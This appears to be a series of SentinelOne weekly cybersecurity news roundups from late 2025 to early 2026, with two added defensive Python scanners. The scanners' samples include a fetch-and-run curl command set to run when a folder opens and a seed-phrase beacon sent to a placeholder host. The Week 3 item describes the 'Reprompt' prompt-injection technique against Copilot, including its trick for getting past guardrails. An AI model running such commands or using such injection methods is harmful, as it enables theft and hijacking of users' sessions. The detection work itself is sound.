Microsoft’s advisory states that Office 2021 and later are automatically protected via a service-side update, but users must restart their apps.

For Office 2016 and 2019, users must install specific updates. Microsoft has also outlined a Registry-based mitigation, requiring creation of a {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B} subkey under COM Compatibility and adding a Compatibility Flags DWORD with a value of 400.

The vulnerability has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, and the agency mandates that federal entities must patch affected systems by February 16, 2026.

As attackers continue to target Microsoft’s suite of products to access sensitive business data, users are advised to prioritize updating Office, applying Registry mitigations if needed, and exercising caution with untrusted Office documents to prevent compromise.

This update follows January 2026 Patch Tuesday, which addressed 114 flaws, including one other actively exploited zero-day in Desktop Window Manager enabling attackers to read memory addresses linked to remote ALPC ports.

The Good, the Bad and the Ugly in Cybersecurity – Week 4

23 January 2026, 14:21

The Good | Authorities Expose RaaS Leaders, Prosecute Identity Hackers & Tighten EU Cybersecurity Rules

Law enforcement in Ukraine and Germany have moved to dismantle the Black Basta ransomware gang, confirming its leader and placing him on Europol and Interpol wanted lists. Identified as Oleg Evgenievich Nefedov, the Russian national is also known online as kurva, Washington, and S.Jimmi.

Police have also arrested two alleged Black Basta affiliates accused of breaching networks, cracking credentials, escalating privileges, and preparing ransomware attacks.

Investigators also link Nefedov to a secondary role in the now-defunct Conti syndicate, confirming Black Basta’s evolution into a major ransomware-as-a-service (RaaS) operation responsible for hundreds of extortion incidents since 2022.

Police raid residence of suspected affiliates (Source: cyberpolice.gov.ua)

In the United States, Nicholas Moore has pleaded guilty to breaching electronic filing systems tied to the Supreme Court of the United States, AmeriCorps, and the Department of Veterans Affairs. Prosecutors note that he repeatedly accessed the Supreme Court’s restricted system in 2023 using stolen credentials. He also breached AmeriCorps and veterans’ accounts, stealing and leaking sensitive personal and health data. Moore took to Instagram under the account @ihackedthegovernment to post screenshots of his victims’ information. He has since confessed to one count of computer fraud, punishable by one year in prison and a $100,000 fine.

New cybersecurity legislation proposed by the European Commission mandates the removal of high-risk suppliers from telecom networks and shoring up defenses against state-backed and criminal cyber threats targeting critical infrastructure. The plan builds on shortcomings in the EU’s voluntary 5G Security Toolbox, originally designed to limit member states’ reliance on high-risk vendors. It also grants the Commission authority to coordinate EU-wide risk assessments across 18 critical sectors, strengthens ICT supply chain security, and streamlines voluntary certification schemes to improve resilience and technological sovereignty.

The Bad | Contagious Interview Attackers Leverage Visual Studio Code to Deploy Backdoors

DPRK-linked threat actors behind the ongoing Contagious Interview campaign are evolving their tactics by using malicious Microsoft Visual Studio Code projects to deliver backdoors.

In new research, the attackers are seen masquerading as recruiters conducting job assessments, instructing targets to clone repositories from platforms like GitHub and open them in VS Code. Once opened, specially crafted task configuration files automatically execute, fetching obfuscated JavaScript payloads hosted on Vercel domains and deploying multi-stage malware.

After the user grants trust in VS Code, its tasks.json file can automatically run embedded commands (Source: Jamf)

This novel technique, first seen last month, leverages VS Code’s runOn: folderOpen feature to trigger execution whenever a project is accessed. Earlier variants delivered the BeaverTail and InvisibleFerret implants, while newer versions disguise droppers as benign spell-check dictionaries to achieve remote code execution.

As part of the final payload, the backdoor logic establishes a continuous execution loop to harvest basic host information and fingerprints systems before executing attacker-supplied code. In some cases, additional scripts are downloaded minutes later to beacon frequently to a remote server, run further commands, and erase traces of activity. Researchers note that parts of the malware may be AI-assisted due to its code structure and inline comments.

Targets are typically software engineers, especially those working in the cryptocurrency, blockchain, and fintech sectors, where access to source code, credentials, and digital assets is valuable. Parallel research shows similar abuse of VS Code tasks to deploy backdoors, cryptominers, and credential-stealing modules via multiple fallback methods.

DPRK-based threat actors are rapidly experimenting with various delivery methods to increase the success of their attacks. Developers can counter the threat by continuing to scrutinize third-party repositories, carefully review task configurations, and install only trusted dependencies.
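As an added example, not code from the original post or from Jamf, a small inspector for the review the paragraph above recommends: it parses a repository's .vscode/tasks.json, tolerating the comments and trailing commas VS Code accepts, and reports any task set to run on folderOpen together with the command it would run and whether its output is hidden; the sample tasks.json and the example.invalid URL are constructed.

```python
import json
import os

# Constructed sample tasks.json: JSONC (comments, trailing comma) with one task
# set to run as soon as the folder is opened and trusted; URL is a placeholder.
SAMPLE_TASKS_JSON = r'''
{
  // VS Code tasks file, constructed for this example
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "setup", // innocuous name, output hidden
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -fsSL https://example.invalid/setup.sh | sh"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" }
    }
  ]
}
'''

def strip_jsonc(text):
    """Drop // and /* */ comments and trailing commas outside string literals,
    which VS Code tolerates but json.loads does not."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # copy the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif c in "}]":                       # drop a comma left dangling before a closer
            k = len(out)
            while k > 0 and out[k - 1].isspace():
                k -= 1
            if k > 0 and out[k - 1] == ",":
                del out[k - 1:]
            out.append(c)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)

def _cmdline(obj):
    return " ".join([str(obj.get("command", ""))] + [str(a) for a in obj.get("args", [])]).strip()

def find_autorun_tasks(tasks_json_text):
    """Return the tasks whose runOptions.runOn is folderOpen, with the command
    they would run (including per-platform overrides) and whether output is hidden."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        commands = {"default": _cmdline(task)}
        for os_key in ("windows", "linux", "osx"):
            if isinstance(task.get(os_key), dict) and "command" in task[os_key]:
                commands[os_key] = _cmdline(task[os_key])
        findings.append({
            "label": task.get("label", "<unlabelled>"),
            "type": task.get("type"),
            "commands": commands,
            "silent": (task.get("presentation") or {}).get("reveal") == "silent",
        })
    return findings

def scan_workspace(root):
    """Check <root>/.vscode/tasks.json, the file VS Code reads once the folder is trusted."""
    path = os.path.join(root, ".vscode", "tasks.json")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8-sig") as fh:
        return find_autorun_tasks(fh.read())

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[folderOpen] {f['label']!r} ({f['type']}, silent={f['silent']}): {f['commands']}")
```

Run scan_workspace on a freshly cloned repository before granting it workspace trust; an empty list means no task is wired to folderOpen in that file.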

The Ugly | Attackers Target Misconfigured Training Apps to Access Cloud Environments

Threat actors are targeting misconfigured web applications like DVWA and OWASP Juice Shop to infiltrate cloud environments of Fortune 500 companies and their security vendors.

These intentionally vulnerable apps, designed for security training and internal testing, are exposed publicly and tied to privileged cloud accounts, creating a perfect storm of risks advantageous to attackers. Researchers have found nearly 2000 live, exposed apps, many linked to overly permissive identity access management (IAM) roles on AWS, GCP, and Azure, often using default credentials.

Attackers are leveraging the apps to deploy crypto miners, webshells, and persistence mechanisms. About 20% of the DVWA instances found contain malicious artifacts, including XMRig cryptocurrency miners and a self-restoring watchdog.sh script that downloads additional AES-256-encrypted tools and removes competing miners.

PHP webshells like filemanager.php are also being deployed, allowing file operations and command execution, sometimes with indicators hinting at the operators’ origin.

XMRig mining Monero to xmr[.]kryptex[.]network resulting in the attacker keeping 100% of the proceeds (Source: Pentera)

These exposed credentials could provide attackers full access to S3 buckets, GCS, and Azure Blob Storage, meaning attackers have read and write permissions to Secrets Manager, can interact with container registries, and obtain admin cloud privileges.

With these attacks active in the wild, organizations are urged to take steps to minimize their risk profile. Key defenses include maintaining a resource inventory, isolating test environments, and enforcing least-privilege IAM roles. By also replacing default credentials and automating resource expiration, organizations can eliminate systemic blind spots in non-production systems.

The Good, the Bad and the Ugly in Cybersecurity – Week 3

16 January 2026, 14:29

The Good | Authorities Arrest 34 in Black Axe Cyber Fraud Crackdown

Spanish police have arrested 34 suspects tied to a cyber fraud network allegedly linked to the Black Axe group, following a joint operation with Europol. After raids across four cities, authorities seized €66,400 in cash, vehicles, devices, and froze €119,350 held in bank accounts.

Investigators say the Nigeria-led ring ran man-in-the-middle (MitM) and business email compromise (BEC) scams, causing over $6 million in losses total. So far, four suspected leaders of the network have been jailed pre-trial as the probe continues into Europe-wide money mule networks.

In other news this week, the latest iteration of BreachForums has suffered another data breach after a MyBB users database was leaked online. This occurred after a site named after the ShinyHunters extortion gang released a 7Zip archive exposing over 323,000 user records and the forum’s PGP private key. While most IP addresses mapped to local loopback values, more than 70,000 resolved to public addresses valuable to cybersecurity researchers and law enforcement.

In Amsterdam, the nation’s Court of Appeal has sentenced a Dutch national to seven years for computer hacking and attempted extortion with evidence stemming from Sky ECC, an end-to-end encrypted chat service that Europol dismantled in 2021. Though one cocaine import charge was dropped, judges upheld the convictions tied to hacking port logistics systems in Rotterdam, Barendrecht, and Antwerp.

The individual was found using malware-laced USB sticks, which then enabled covert drug imports, data theft, and malware re-sale between 2020 and 2021.

The Bad | Researchers Expose ‘Reprompt’ Attack That Could Hijack Microsoft Copilot Sessions

Security researchers have disclosed a novel attack technique dubbed ‘Reprompt’ that could enable attackers to silently hijack a user’s Microsoft Copilot session and exfiltrate sensitive data with a single click. The method abuses how Copilot processes URL parameters, enabling malicious prompts to be injected directly through a legitimate Copilot link.

Reprompt works by embedding hidden instructions in the “q” parameter of a Copilot URL. Should a victim click the link, Copilot automatically executes the malicious prompt within the user’s authenticated session. That session remains active even after the Copilot tab is closed, meaning attackers could continue issuing follow-up commands without further user interaction. Since no plugins, malware, or visible prompts are required, the activity is effectively invisible.

To bypass Copilot’s safeguards, the researchers combined three techniques: parameter-to-prompt (P2) injection, a double-request trick that exploits guardrails applying only to the initial request, and a chain-request model where Copilot dynamically fetches new instructions from an attacker-controlled server.

Combined, these techniques could enable continuous, stealthy data exfiltration, while client-side, legacy security tools would be unable to determine what information was being stolen.

Double request to bypass safeguards (Source: Varonis)

Reprompt only impacts Copilot Personal; those using Microsoft 365 Copilot are not impacted due to additional controls such as auditing, DLP, and administrative restrictions. Varonis disclosed the issue to Microsoft on August 31, 2025 and the vulnerability was addressed in this month’s Patch Tuesday. Currently, there are no reports of in-the-wild exploitation.

The findings, however, are indicative of the risks posed by LLMs and AI assistants. They underscore the need for security teams to understand the attack surface these tools present as their use in enterprise environments continues to proliferate.

The Ugly | Charity-Themed ‘PluggyApe’ Malware Targets Ukrainian Defense Forces

Ukraine’s CERT-UA has reported a charity-themed cyber espionage campaign targeting officials within the country’s Defense Forces between October and December 2025. The activity is attributed with medium confidence to a Russian-aligned threat group tracked as Laundry Bear (aka Void Blizzard or UAC‑0190), a cluster previously linked to the 2024 breach of Dutch police systems.

These attacks have been observed relying heavily on tailored social engineering tactics delivered via Signal and WhatsApp. Targets receive instant messages, often from compromised or spoofed Ukrainian phone numbers, directing them to fake charity websites where they are urged to download password-protected archives.

These archives contain malicious executables disguised as documents, including PIF files built with PyInstaller, which ultimately deploy a Python-based backdoor called ‘PluggyApe’. Once installed, PluggyApe profiles the infected system, assigns a unique victim identifier, and establishes persistence through Windows Registry changes. The malware supports remote command execution and data exfiltration, communicating over WebSocket or MQTT.

Examples of malicious lures (Source: CERT-UA)

Later versions of PluggyApe, observed from December 2025 onward, introduced stronger obfuscation, additional anti-analysis checks, and more resilient command-and-control (C2) mechanisms. Instead of hardcoding C2 infrastructure, the malware dynamically retrieves server addresses from public paste services such as rentry[.]co and pastebin[.]com, encoded in Base64, allowing operators to rapidly rotate infrastructure.

CERT-UA emphasized that mobile devices and messaging platforms have become primary attack vectors due to weaker monitoring and widespread trust. Compounding this is the attackers’ demonstrated knowledge of their targets and use of the Ukrainian language, audio, and video communication to increase credibility.

Alongside this campaign, CERT-UA also reports additional activity from other threat clusters targeting Ukrainian defense forces, local governments, and educational institutions using phishing, stealer malware, and open-source backdoors – all pointing to sustained and evolving cyber pressure facing Ukraine’s public sector.

The Good, the Bad and the Ugly in Cybersecurity – Week 2

9 January 2026, 11:00

The Good | U.K. Government Resets Public-Sector Cybersecurity With £210M Action Plan

The United Kingdom has unveiled a sweeping reset of its public-sector cybersecurity strategy, committing more than £210 million ($283 million) to shore up defenses across government departments and essential services. This investment is part of the new Government Cyber Action Plan, which marks a clear departure from years of fragmented oversight and outdated, legacy technology.

The new Government Cyber Action Plan sets a clear path to strengthen cyber security and boost resilience across the public sector.

Read more below⬇ https://t.co/HCswSOGuhP

— NCSC UK (@NCSC) January 6, 2026

The core of the plan is a centralized Government Cyber Unit, tasked with coordinating risk management, setting mandatory security standards, and leading incident response. Digital Government Minister Ian Murray framed the shift as urgent, warning that cyberattacks can take critical public services offline within minutes. Recent incidents like ransomware-driven NHS disruptions and the compromise of Ministry of Defence payroll systems all show that these risks are recurring realities rather than theoretical threats.

The action plan introduces stricter accountability for senior leaders, enhanced visibility into cyber risks, and more robust, centrally coordinated incident response exercises. Strategic government suppliers will also face tougher contractual cybersecurity requirements as concerns over supply chain vulnerabilities grow.

In tandem with the plan, the government is advancing the Cyber Security and Resilience Bill, which builds on the 2018 Network and Information System (NIS) Regulations. Separately, public bodies and critical infrastructure operators are set to be banned from paying ransomware demands, while telecom providers have pledged to curb phone-number spoofing.

While challenges still remain, this new strategy signals a long-overdue cultural and structural shift. If matched with sustained investment and accountability, it could finally place the U.K. public sector on a more resilient and security-first footing in the face of accelerating cyber threats.

The Bad | China-Linked UAT-7290 Expands Linux-Based Espionage Beyond South Asian Telcos

UAT-7290, a China-linked threat actor, has expanded its cyber espionage operations beyond its focus on South Asian telecommunications firms to include organizations across Southeastern Europe. Active since at least 2022, the group is known for its extensive reconnaissance, network penetration techniques, and heavy reliance on Linux-based malware to compromise public-facing infrastructure.

Cyber researchers assess that UAT-7290 conducts extensive technical profiling of targets before exploiting exposed edge network devices. The actor primarily leverages one-day exploits and targeted SSH brute force attacks, often relying on publicly available proof of concept (PoC) exploit code rather than developing their own. Once initial access is achieved, the group escalates privileges and deploys a modular malware ecosystem tailored for persistence and lateral movement.

UAT-7290’s core tooling centers on Linux implants, beginning with the RushDrop (ChronosRAT) initial dropper, which initiates the infection chain and deploys additional components such as DriveSwitch and the SilentRaid (MystRodX) backdoor. SilentRaid enables long-term access through a plugin-based architecture that supports remote shell access, port forwarding, file operations, and credential-related data collection. While Linux remains the primary focus, the group has occasionally deployed Windows malware – tools commonly shared among China-aligned threat actors.

UAT-7290 is also known for playing a secondary role as an initial access provider. It converts compromised devices into Operational Relay Boxes (ORBs), infrastructure that can later be reused by other Chinese espionage groups, using the Bulbature backdoor.

The tooling and infrastructure overlap with clusters such as APT10 and Moshen Dragon, reinforcing assessments that UAT-7290 is both an espionage operator and a strategic enabler within the broader Chinese cyber ecosystem.

The Ugly | Researchers Reveal Critical n8n Vulnerabilities Enabling Remote Code Execution

A series of critical vulnerabilities were recently disclosed in the open-source workflow automation platform n8n, allowing unauthenticated attackers to achieve remote code execution (RCE), perform arbitrary commands, and execute untrusted code leading to full compromise.

Beginning with CVE-2025-68668, dubbed ‘N8scape’, this critical flaw (CVSS 9.9) involves a sandbox bypass in the Python Code Node using Pyodide. It affects n8n versions prior to 2.0.0 and allows users with workflow permissions to execute arbitrary OS commands with the same privileges as the n8n service. Version 2.0.0 made a task-runner-based native Python implementation the default, which improves security isolation and addresses the issue.

Shortly afterward, n8n disclosed an even more severe issue tracked as CVE-2026-21877, a CVSS 10.0 vulnerability enabling authenticated remote code execution under certain conditions. Affecting both self-hosted and n8n cloud deployments, the flaw could allow untrusted code execution, eventually leading to compromise of the entire instance. Although the critical flaw is patched in version 1.121.3, administrators are advised to apply the updates quickly, especially given a growing pattern of critical RCE-class vulnerabilities in the platform.

The third and latest disclosure this week, codenamed ‘Ni8mare’ and tracked as CVE-2026-21858 (CVSS 10.0), is a critical flaw that allows complete takeover of affected instances. Exploiting a content-type confusion issue in n8n’s webhook and form handling, attackers can read arbitrary files, extract credentials and encryption keys, forge admin sessions, and ultimately achieve RCE. Researchers noted that a compromised n8n instance becomes a single point of failure due to centralized storage of API keys, OAuth tokens, and infrastructure credentials, making it a veritable data trove for threat actors.

Invoking the content-type-confusion bug (Source: Cyera)

At the time of writing, reports from attack surface management vendors are observing over 26,000 exposed n8n instances online, emphasizing the need for timely patching, controlled exposure, and strict access management.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

2 January 2026, 11:00

The Good | Authorities Crackdown on BlackCat and Coinbase Malicious Insiders & Malware Operators

Two former employees from Sygnia and DigitalMint have pleaded guilty for participating in ransomware attacks linking them to the BlackCat (ALPHV, AlphaVM) operation. Ryan Goldberg and Kevin Martin admitted to conspiring to extort U.S. organizations, abusing the same security expertise they once used to defend cyber victims. Working with a third accomplice, they breached multiple companies nationwide and shared roughly 20% of ransom proceeds for access to BlackCat’s infrastructure. Prosecutors say they demanded between $300,000 and $10 million per victim.

Beyond insider risk at the highest technical levels, similar threats are emerging from much lower in the access chain, too. Indian authorities arrested a former customer support agent for aiding threat actors in the May data breach at Coinbase, a popular crypto exchange; more arrests are expected. The incident exposed data from roughly 69,500 users after bribed staff at outsourcing partner TaskUs enabled access. This news follows charges against Ronald Spektor, accused of stealing $16 million by impersonating Coinbase, highlighting ongoing insider and social engineering risks.

We have zero tolerance for bad behavior and will continue to work with law enforcement to bring bad actors to justice.

Thanks to the Hyderabad Police in India, an ex-Coinbase customer service agent was just arrested. Another one down and more still to come.

— Brian Armstrong (@brian_armstrong) December 26, 2025

Beyond insider abuse, attackers are also exploiting everyday user behavior to siphon funds at massive scale. A Lithuanian national was arrested for allegedly infecting 2.8 million systems with clipboard-stealing malware disguised as KMSAuto, an illegal Windows and Office software activator. The suspect used clipper malware to swap cryptocurrency addresses and divert funds to attacker-controlled ones. The Korean National Police Agency says the campaign ran from 2020 to 2023, with a total of KRW 1.7 billion ($1.2M) stolen across thousands of transactions. Authorities warn that pirated software is often a key component in how attackers spread malware.

The Bad | Chinese-Based Attackers Deploy Stealthy Kernel‑Mode ‘ToneShell’ Backdoor

Security researchers have uncovered a significantly more stealthy variant of the ToneShell backdoor, a tool long associated with Chinese state-sponsored cyberespionage activity, now delivered via a kernel‑mode loader for the first time. New analysis links the campaign to G0129 (aka Bronze President, TEMP.Hex, Hive0154), a threat actor known for targeting government agencies, NGOs, and think tanks.

The activity, observed since at least February, primarily targets government organizations across Asia, particularly in Myanmar and Thailand. Investigators have found evidence that some victims had previously been compromised by earlier ToneShell variants, PlugX malware, or the ToneDisk USB worm, indicating long‑term persistence across multiple intrusion waves.

What sets this campaign apart is its use of a malicious kernel‑mode mini‑filter driver, ProjectConfiguration.sys, signed with a stolen or leaked digital certificate originally issued to Guangzhou Kingteller Technology Co., Ltd and valid from 2012 to 2015. Operating deep within the Windows kernel, the driver acts as a rootkit: evading static analysis by resolving kernel APIs at runtime, blocking file deletion and registry access, protecting injected processes, and deliberately interfering with Microsoft Defender by manipulating the WdFilter driver’s load order.

The driver ultimately injects two user‑mode payloads, including the updated ToneShell backdoor, which now features enhanced stealth capabilities. Changes also include a simplified host‑ID scheme, network traffic obfuscation using fake TLS headers, and remote administration capabilities such as file transfer and interactive shell access. Communication occurs over TCP port 443 to attacker‑controlled infrastructure.

ToneShell injection workflow (Source: Securelist)

Researchers note this marks a clear evolution in G0129’s tactics, prioritizing kernel‑level persistence and evasion. As the payload operates almost entirely in memory, memory forensics becomes a critical detection method, alongside monitoring for indicators of compromise tied to the malicious driver and injected shellcode.

The Ugly | Hackers Steal $7M via Compromised Trust Wallet Chrome Extension

After a compromised update to the Trust Wallet Chrome extension went live over the holidays, approximately $7 million has been stolen from nearly 3,000 cryptocurrency wallets. The malicious version 2.68.0 contained a hidden JavaScript file called 4482.js that silently exfiltrated sensitive wallet data, including seed phrases, to an external server, api.metrics-trustwallet[.]com. Users immediately reported funds disappearing after simple wallet authorizations, prompting Trust Wallet to investigate and release a patched version 2.69. CEO Eowyn Chen confirmed the hack and assured users that the company would reimburse affected wallets.

Investigations indicate that attackers likely exploited a leaked Chrome Web Store API key to publish the malicious extension, bypassing Trust Wallet’s standard release procedures. In parallel, threat actors launched a phishing campaign using a Trust Wallet-branded site, fix-trustwallet[.]com, claiming to provide a “vulnerability fix”. Users who entered their seed phrases on the site immediately lost access to their wallets. WHOIS records suggest the phishing domain may be linked to the same actors behind the malicious extension.

Phishing site asking for wallet seed phrases (Source: BleepingComputer)

Trust Wallet, a non-custodial cryptocurrency wallet acquired by Binance in 2018, emphasized that mobile-only users and other browser extension versions were not affected. The company has begun reimbursing victims after verifying wallet ownership, transaction hashes, and affected addresses, while warning users not to share private keys or seed phrases.

Security researchers noted the incident highlights significant risks in browser-based wallets and supply chain attacks, as malicious updates can gain privileged access to funds. Trust Wallet has suspended compromised API keys, reported the malicious domains to registrars, and continues monitoring for scams. Users are strongly advised to immediately update to version 2.69, only use official channels, and verify all communications to protect their crypto assets.
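A release-review step that catches the pattern described above, as an added example that is not Trust Wallet’s or the original post’s code: it diffs an unpacked extension release against the last known-good one, flagging newly added files and any host outside an allowlist, whether declared in the manifest or hard-coded in a script. The file names, hosts and allowlist below are constructed placeholders.

```python
"""Audit an unpacked browser-extension bundle for unexpected outbound
endpoints and newly added files. Added example, not Trust Wallet's code;
the bundle contents and allowlist below are constructed for illustration."""
import json
import re
from urllib.parse import urlparse

# Absolute http(s) URL literals inside JavaScript sources.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"`)]*)?")


def audit_bundle(files: dict[str, str], allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Return (file, host-or-pattern) pairs for every endpoint the bundle
    can reach that is not on the allowlist: wildcard or unknown hosts in the
    manifest, and unknown hosts hard-coded in any JS file."""
    findings = set()
    manifest = json.loads(files.get("manifest.json", "{}"))
    for entry in manifest.get("host_permissions", []) + manifest.get("permissions", []):
        host = urlparse(entry).hostname if "://" in entry else None
        if host and ("*" in host or host not in allowed_hosts):
            findings.add(("manifest.json", entry if "*" in host else host))
    for name, body in files.items():
        if name.endswith(".js"):
            for url in URL_RE.findall(body):
                host = urlparse(url).hostname
                if host and host not in allowed_hosts:
                    findings.add((name, host))
    return sorted(findings)


def new_files(previous: dict[str, str], current: dict[str, str]) -> list[str]:
    """Files present in the new release but absent from the last known-good one."""
    return sorted(set(current) - set(previous))


# Constructed known-good release and a constructed follow-up release that adds
# a wildcard host permission plus a new script beaconing to an unlisted host.
ALLOWED_HOSTS = {"api.example-wallet.invalid"}
GOOD_RELEASE = {
    "manifest.json": json.dumps({"manifest_version": 3, "version": "2.67.0",
                                 "host_permissions": ["https://api.example-wallet.invalid/*"]}),
    "background.js": "fetch('https://api.example-wallet.invalid/v1/prices');",
}
BAD_RELEASE = dict(GOOD_RELEASE)
BAD_RELEASE["manifest.json"] = json.dumps({"manifest_version": 3, "version": "2.68.0",
    "host_permissions": ["https://api.example-wallet.invalid/*", "https://*/*"]})
BAD_RELEASE["4482.js"] = "navigator.sendBeacon('https://metrics-collector.invalid/c', seed);"

if __name__ == "__main__":
    for label, rel in (("good", GOOD_RELEASE), ("bad", BAD_RELEASE)):
        print(label, audit_bundle(rel, ALLOWED_HOSTS), new_files(GOOD_RELEASE, rel))
```

Run against the two constructed releases, the good one is clean while the bad one reports the new `4482.js` file, its unlisted beacon host, and the wildcard host permission.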


The Best, the Worst and the Ugliest in Cybersecurity | 2025 Edition

26 December 2025, 11:00

It’s that time of year when we revisit the wins and challenges of 2025 in our special year-end edition of The Good, The Bad and the Ugly. Here are the biggest stories that defined the best, the worst, and the ugliest cybersecurity moments from this past year.

The Best

2025 has been a year of remarkable victories for law enforcement agencies worldwide, highlighting the power of cross-border coordination. From high-profile arrests to major asset seizures, authorities have steadily dismantled the infrastructure supporting criminal and state-aligned cyber actors.

In the last two weeks alone, Eurojust led a takedown of Ukrainian call centers that defrauded Europeans of €10M, and law enforcement seized servers from the E-Note crypto exchange, which laundered $70M from ransomware and account takeovers. Similarly, the arrest of Ukrainian national Victoria Dubranova for aiding Russian state-backed hacktivists, alongside Spanish authorities capturing a 19-year-old selling 64M stolen records, underscores the growing international effort to hold cybercriminals accountable.

Significant infrastructure disruptions further amplify these successes. Convictions of cybercriminals targeting sensitive systems, such as the prison sentence for the “evil twin” WiFi hacker and the seizure of the Cryptomixer crypto mixer, which had laundered €1.3B since 2016, are tangible results in stopping large-scale fraud. Law enforcement groups also took multifaceted approaches, combining legal action, sanctions, and operational disruption to arrest Russian and DPRK-related cybercriminals and to sanction bulletproof hosting providers and foreign actors.

Our 🆕 joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more 👉 https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

International coordination has also been key this year. Interpol’s massive operations across Africa, including Operation Serengeti 2.0 and Operation Red Card, led to the arrests of thousands of suspects and the seizure of tens of millions in stolen assets. Europol dismantled SIMCARTEL, a global SIM-box fraud network, seizing servers, SIM cards, crypto, and luxury vehicles, while coordinated actions targeted Diskstation ransomware gangs and hacktivist infrastructure. In parallel, DOJ- and CISA-led operations disrupted high-value schemes, including Prince Group’s $15B romance scam and multiple ransomware networks, while releasing decryptors for Phobos and 8Base victims to provide tangible relief. Law enforcement also extended its reach to regulatory and infrastructure initiatives, introducing the Cyber Trust Mark certification for IoT devices and HIPAA encryption and MFA updates to ensure cyber safety from the top down.

Source: Group-IB

On the cybersecurity innovation front, CISA’s launch of Thorium, an open-source platform to help government agencies automate forensic investigations, and AI-enabled threat detection systems have allowed authorities to act on incidents more rapidly, from ransomware affiliate seizures to monitoring AI misuse.

The Worst

State-sponsored crime, supply chain abuse, and emerging malware strains have collectively challenged defenders worldwide.

DPRK-linked hackers were prolific throughout 2025, stealing over $2B in cryptocurrency and blending traditional heists with espionage campaigns like Operation Contagious Interview targeting remote workers. Similarly, Iranian-linked UNK_SmudgedSerpent and China-linked TA415 campaigns leveraged phishing, fake platforms, and developer tooling to compromise high-value targets, from policy experts to enterprise networks.

2025 saw developer platforms, open-source ecosystems, and smart contracts become prime targets for threat actors. VS Code extensions like Bitcoin Black and Codo AI exfiltrated credentials from crypto wallets, while NPM packages such as XORIndex and os-info-checker-es6 delivered multi-stage payloads. Novel malware families including SleepyDuck RAT and Betruger backdoors emerged, masquerading as popular extensions on the Open VSX open-source registry and supporting ransomware campaigns, respectively. Even AI-powered attacks emerged, with AkiraBot, Gamma AI phishing, and social engineering campaigns bypassing CAPTCHAs and traditional defenses to exploit SMBs and enterprise targets.

This year, financial and operational impacts were particularly severe. Holiday banking fraud alone netted $262M via account takeovers exploiting phishing, MFA bypasses, and impersonation. YouTube trading bot scams, cloud identity theft campaigns, and multi-stage ransomware attacks like EncryptHub and Katz Stealer drained millions, targeting both enterprise systems and individuals. Exploits in misconfigured cloud resources and abandoned subdomains further amplified these risks, showing how minor misconfigurations can fuel sophisticated attacks.

State-aligned and nation-state threat actors also pursued espionage alongside financial crime. Fake job schemes and AI/crypto talent lures enabled targeted malware deployment, while advanced persistent threats like UNC3886 delivered stealthy backdoors to corporate and diplomatic networks. Malicious actors increasingly weaponized cloud services, messaging platforms, and developer tools, blurring the line between operational convenience and attack vectors.

Error message with ClickFix message (Source: Validin)

The Ugliest

The “Ugly” dimension of 2025 was defined by AI-assisted attacks, zero-day exploitation, and ransomware industrialization, which amplified the scale and complexity of cybercrime. Large ransomware operations like CyberVolk resurfaced with AI-driven VolkLocker, automating negotiation, phishing, and multilingual attacks while leveraging Telegram for orchestration. AI also enhanced the capabilities of smaller, fragmented ransomware crews, allowing rapid targeting and payload deployment, though operational flaws sometimes limited effectiveness.

Zero-day vulnerabilities were actively exploited across critical infrastructure and enterprise platforms. React2Shell in React/Next.js, Triofox (CVE-2025-12480), Oracle E-Business Suite (CVE-2025-61884), and ToolShell in SharePoint permitted full system compromise, highlighting that popular frameworks and business-critical software remain high-value targets. Cloud and AI services were similarly exploited; EchoLeak and Google Gemini LLM prompt injections enabled exfiltration of sensitive information without user interaction. Attackers in all these cases demonstrated a capacity to combine stealth, automation, and sophisticated payloads for maximum disruption.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance 👉 https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

2025 also saw cyber espionage intertwined with physical and geopolitical threats. Iranian-backed Crimson Sandstorm leveraged cyber reconnaissance to support missile strikes, while Chinese and DPRK actors continued to target aid operations, humanitarian NGOs, and government infrastructure, often exploiting IoT, industrial control systems, or open-source software to do so. In cross-border campaigns, long-dwell malware like BRICKSTORM and protocol-level exploits such as MadeYouReset created cascading impacts across critical networks and infrastructure.

PhantomCaptcha infection paths

The impact of many attacks this year was amplified by third-party risk. Breaches of Discord vendors, Mixpanel, and GitHub Actions exposed vast quantities of PII and credentials, enabling subsequent ransomware, phishing, or espionage campaigns. The combination of AI, automation, and high-impact vulnerabilities exemplifies a cybercrime industrial complex, where opportunistic and state-aligned actors scale operations with unprecedented speed and sophistication.

Conclusion

As 2025 draws to a close, one thing is clear: cybersecurity has become more interconnected, more consequential, and more dependent on collective responsibility than ever before. From supply chain fragility and identity-based intrusion to the continued convergence of cybercrime and geopolitics, the challenges ahead demand deeper collaboration, stronger accountability, and a more deliberate approach to trust across the digital ecosystem.

From all of us here at SentinelOne, we wish you a happy, healthy, and secure New Year 2026!
